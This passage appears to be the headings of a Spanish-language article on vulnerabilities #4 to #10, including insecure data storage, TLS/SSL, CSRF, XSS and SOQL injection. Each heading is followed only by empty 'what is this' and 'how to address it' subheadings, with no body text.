¿Cómo puedo abordar esto?

#4: Almacenamiento inseguro de datos confidenciales

¿Qué es esto?

¿Cómo puedo abordar esto?

#5 — Configuración TLS/SSL

¿Qué es esto?

¿Cómo puedo abordar esto?

#6 — Información confidencial en depuración

¿Qué es esto?

¿Cómo puedo abordar esto?

#7 – CSRF

¿Qué es esto?

¿Cómo puedo abordar esto?

N.º 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

¿Qué es esto?

¿Cómo puedo abordar esto?

#9: JavaScript no está en recursos estáticos

¿Qué es esto?

¿Cómo puedo abordar esto?

#10 – Inyección SOQL

¿Qué es esto?

¿Cómo puedo abordar esto?